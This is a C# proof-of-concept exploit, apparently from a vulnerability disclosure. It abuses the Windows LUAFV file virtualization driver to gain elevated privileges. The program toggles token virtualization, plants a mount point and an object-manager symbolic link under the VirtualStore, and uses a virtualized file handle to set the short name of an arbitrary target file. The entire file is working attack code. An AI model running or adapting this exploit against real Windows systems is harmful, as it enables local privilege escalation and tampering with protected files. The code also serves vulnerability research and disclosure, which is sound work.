﻿using NtApiDotNet;
using System;
using System.IO;
using System.Text;

namespace PoC_LUAFV_SetShortName_EoP
{
    class Program
    {
        static void CreateFileWithSecurity(string target_path, string sddl, string data)
        {
            SecurityDescriptor sd = string.IsNullOrEmpty(sddl) ? null : new SecurityDescriptor(sddl);
            using (var obja = new ObjectAttributes(target_path, AttributeFlags.CaseInsensitive, (NtObject)null, null, sd))
            {
                using (var file = NtFile.Create(obja,
                        FileAccessRights.WriteData, 0, 0, FileOpenOptions.NonDirectoryFile, FileDisposition.Create, null))
                {
                    if (!string.IsNullOrEmpty(data))
                    {
                        file.Write(Encoding.ASCII.GetBytes(data), 0);
                    }
                    Console.WriteLine("Created Target Path: {0}", target_path);
                }
            }
        }

        static string CreateVirtualStore(string target_path)
        {
            string base_path = target_path.Substring(target_path.IndexOf(':') + 2);
            string virtual_path = Path.Combine(
                Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
                "VirtualStore", base_path);

            Console.WriteLine("Virtual Path: {0}", virtual_path);
            Directory.CreateDirectory(virtual_path);
            return virtual_path;
        }

        static NtSymbolicLink CreateSymlink(string virtual_path, string short_name, string target_path)
        {
            NtFile.CreateMountPoint(NtFileUtils.DosFileNameToNt(virtual_path), @"\RPC Control", string.Empty);
            return NtSymbolicLink.Create($@"\RPC Control\{short_name}", NtFileUtils.DosFileNameToNt(target_path));
        }

        static void SetVirtualization(bool enable)
        {
            using (var token = NtToken.OpenProcessToken())
            {
                token.VirtualizationEnabled = enable;
            }
        }

        static string GetShortName(NtFile file)
        {
            using (var buffer = new SafeStructureInOutBuffer<FileNameInformation>(32 * 1024, true))
            {
                IoStatus status = new IoStatus();
                NtSystemCalls.NtQueryInformationFile(file.Handle,
                    status, buffer, buffer.Length, FileInformationClass.FileAlternateNameInformation).ToNtException();
                char[] result = new char[buffer.Result.NameLength / 2];
                buffer.Data.ReadArray(0, result, 0, result.Length);
                return new string(result);
            }
        }

        static void CreateShortName(string new_file, string short_name)
        {
            // Setup the file path.
            string base_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "luafv_" + Guid.NewGuid());
            Console.WriteLine("Base Path: {0}", base_path);
            Directory.CreateDirectory(base_path);
            Directory.CreateDirectory(Path.GetDirectoryName(new_file));
            string target_path = NtFileUtils.DosFileNameToNt(Path.Combine(base_path, short_name));
            var virtual_path = CreateVirtualStore(base_path);

            CreateFileWithSecurity(target_path, "D:(A;;GR;;;WD)(A;;GA;;;BA)", "This is a dummy file\r\n");
            SetVirtualization(true);

            using (var file = NtFile.Open(target_path, null, FileAccessRights.ReadAttributes | FileAccessRights.WriteAttributes,
                FileShareMode.Read, FileOpenOptions.NonDirectoryFile))
            {
                SetVirtualization(false);
                string full_path = file.FullPath;
                Console.WriteLine("File Before: {0} {1}", full_path, file.GrantedAccess);
                using (CreateSymlink(virtual_path, short_name, new_file))
                {
                    Console.WriteLine("Query Compression: {0}", file.CompressionFormat);
                    string new_short_name = GetShortName(file);
                    string new_long_name = file.Name;
                    Console.WriteLine("File Short Name {0} - Long Name {1}", new_short_name, new_long_name);
                    if (!new_short_name.Equals(short_name, StringComparison.OrdinalIgnoreCase))
                    {
                        Console.WriteLine("Error: Short name not set to expected value");
                    }
                }
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 2)
                {
                    Console.WriteLine("Specify target file and short name to apply.");
                    return;
                }

                CreateShortName(Path.GetFullPath(args[0]), args[1]);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
